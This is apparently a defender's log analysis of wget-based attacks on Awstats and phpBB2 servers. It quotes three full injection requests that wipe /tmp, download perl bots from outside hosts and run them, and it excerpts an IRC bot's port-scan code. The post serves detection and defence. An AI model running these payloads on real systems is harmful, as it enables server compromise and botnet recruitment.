|
|
After all the Awstats and PHPBB vulnerabilities, several of which use wget to fetch perl bots or other malware, it seemed like a good idea to grep httpd access logs for 'wget.' Another good place to look seemed like Snort alerts (SID 1330 "WEB-ATTACKS wget command attempt"). We detected 47 instances of this SID from 23 unique source addresses between April 02 and April 16. The congregated log file of wget strings is viewable here. There are a few extraneous results caused by poor search criteria. We will ignore these since they appear to be legitimate entries (such as the wget string in referrer fields). Here is one of the earlier ones that appears to have since been disabled (www.vpasp.go.ro now resolves to 127.0.0.1). The code wants the target web server to fetch a file masquerading as a session ID string, perhaps to stay low-key in outgoing proxy logs. The file is then run as a perl script. Unfortunately since www.vpasp.go.ro resolves to localhost, we can't fetch the file to see it's contents. A posting on Google Groups identified this URL to be distributing the Backdoor.Perl.Shellbot.a malware, but little else is known. The session ID can also be found on this Chilean web site's Awstats page. Our sympathy goes out to those administrators who are apparently still running version 4.0 from April of 2002. GET/awstats/awstats.pl?configdir=|echo; \ cd /tmp; rm -rf *; killall -9 perl; \ wget www.vpasp.go.ro/sess_3539283e27d73cae29fe2b80f9293f60; \ perl sess_3539283e27d73cae29fe2b80f9293f60; \ echo; echo| Next, we stumble upon a trace left by Santy or a similar variant of code that exploits PHPBB2 vulnerabilities. The two remote servers have since been cleaned of bot.htm and ssh2.htm. The domains, file names, and sequence of events here is fairly well documented already, so we won't waste any time on this one. GET /forums/viewtopic.php?t=63&rush=echo \ _START_; cd /tmp; mkdir .temp22; cd .temp22; \ wget http://www.quasi-sane.com/pics/bot.htm; \ wget http://weblicious.com/.notes/ssh2.htm; \ perl ssh2.htm; rm ssh.htm; perl bot.htm; \ rm bot.htm; echo _END_&highlight='.passthru \ ($HTTP_GET_VARS[rush]).'; The remainder of the log file entries are attempts to fetch questionable content in the form of 3 text files from 61.85.234.215 (scripted with LWP::Simple). Despite the 22 unique source IP addresses that submitted this malicious request to our web server, they always instruct us to download files from 61.85.234.215 (owned by KOREA TELECOM Internet Operating Center). This may suggest that the source IPs are all infected with whatever worm or automated code is producing these logs; and that this Korean web server is the designated host for the source code. Here is the translated log file entry (view link above for unformatted version): GET /forums/viewtopic.php?t=63&rush=echo \ _START_; cd /tmp; mkdir .temp; cd .temp; \ wget http://61.85.234.215/.zk/msn.txt; \ wget http://61.85.234.215/.zk/coll.txt; \ wget http://61.85.234.215/.zk/g.txt; \ perl msn.txt; rm msn.txt; perl coll.txt; rm coll.txt \ perl g.txt; rm g.txt; echo _END_ \ &highlight='.passthru($HTTP_GET_VARS[rush]).' In contrast with the other instances, all of the remote files still exist, which gives us a trail to follow. Without a doubt we can site the following links based on similarities:
The last URL at milw0rm shows a very similar body of code, but directed at AltaVista's search engine. The msn.txt file spaws a process that searches for potential vulnerabilities using MSN's utility. Likewise, g.txt uses Google and Yahoo for the same purpose. Both files have 61.85.234.215 hard coded into their source. A few seconds after being infected by this code, exploited web servers are searching for new targets using popular search engines, then commanding those machines to download the same 3 scripts from the Korean web server. The third file, coll.txt deserves a bit more attention. A web site in France has a post which shows a near exact copy of the coll.txt script. The file acts as an IRC bot named coll, according to text in the script. It connects to eu.undernet.org and announces "Bot powered by DDOS TEAM" to the channel administrators ("RockYCroW", "El_S0mbra", and "kenshin"). Per the following function, the coll.txt is also programmed to accept commands from the IRC channel, one of which is to perform a port scan against any host supplied as an argument: if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto
=> 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
Then it reports back the open ports in a private message: if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
}
Perhaps a bit more worrysome are the other functions which coll.txt is capable. It can act as a remote shell that sends the kernel's response to the other machines via IRC, transfer files to and from the local filesystem, and participate in DDoS attacks upon request. If wget must be installed on your web server, restricting execution of wget to the root user may prevent some of these actions. Regardless of which server vulnerability pops up next, if the exploit can only gain httpd privileges, they won't be able to fetch the rest of their toolkit using wget. Also, as we saw in this attack, a successful wget session in any of the requests shown here would probablyleave the wget output in httpd log files. It is interesting that no one has began redirecting STDOUT and STDERR to /dev/null in any of the observed attacks thus far. |
|